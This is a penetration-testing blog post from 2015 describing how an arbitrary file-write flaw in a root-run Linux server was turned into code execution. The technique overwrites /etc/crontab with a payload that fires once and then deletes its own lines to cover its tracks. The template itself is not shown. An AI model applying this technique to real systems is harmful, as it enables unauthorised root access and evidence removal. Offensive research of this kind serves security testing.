• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar
  • Skip to footer

War Room

Shells from above

RSM logo

  • Home
  • About
  • Blog
  • Talks/Whitepapers
  • Tools
  • Recreation
Home > R&D > Research > Crontab One Time Payload Execution

Crontab One Time Payload Execution

September 21, 2015 By Spencer

Recently, I was writing an exploit for a vulnerability that I had discovered in a Linux based server application. The flaw, when successfully exploited, allowed a file to be written anywhere on the file system with the permissions of the user running the server. In the case of the application I was targeting, it was often executed as root in order to bind to a privileged port and offered no ability to drop privileges after doing so.

After completing a proof of concept exploit that allowed a simple text file to be written to the root users home directory, I immediately wanted to explore options that could leverage this to provide code execution. The technique I settled on overwrote the existing /etc/crontab to execute my provided command payload. Being of sound body and mind, I typically want my shells to be delivered as soon as they can be. In terms for writing a payload to be executed by the Cron daemon, this involves executing the command every minute which may result in “too many” shells, if such a thing exists.

To avoid having the payload executed more than once, I crafted a crontab file which would execute one or more commands at the next minute change and then remove the malicious lines from the file. By removing the lines, the payload cleans up after itself to ensure it is not executed again. I achieved this by simply using a reverse grep (-v flag) to remove the crontab lines that execute every minute and rewrite the remaining lines.

The final result is a template crontab file which could be used in similar situations to execute a payload once at the next minute. The command to be executed as the payload needs to be inserted on line 15. Additional commands can be executed by specifying additional lines starting with the same */1 * * * * root prefix.

Share this...
  • Reddit
  • Email
  • Facebook
  • Twitter
  • Linkedin

Spencer

Primary Sidebar

Categories

  • Defense
  • Forensics
  • Offense
  • Physical
  • R&D

Most Viewed Posts

  • DLL Injection Part 1: SetWindowsHookEx 10.9k views
  • Sophos UTM Home Edition – 3 – The Setup 10.8k views
  • Leveraging MS16-032 with PowerShell Empire 10k views
  • Bypassing Gmail’s Malicious Macro Signatures 9.8k views
  • How to Bypass SEP with Admin Access 8.9k views

Footer

  • RSS
  • Twitter
  • Tools
  • About
  • RSM US LLP

+1 800 903 6264

1 S Wacker Dr Suite 800
Chicago, IL 60606

Copyright © 2023 RSM US LLP. All rights reserved. RSM US LLP is a limited liability partnership and the U.S. member firm of RSM International, a global network of independent audit, tax and consulting firms. The member firms of RSM International collaborate to provide services to global clients, but are separate and distinct legal entities that cannot obligate each other. Each member firm is responsible only for its own acts and omissions, and not those of any other party. Visit for more information regarding RSM US LLP and RSM International.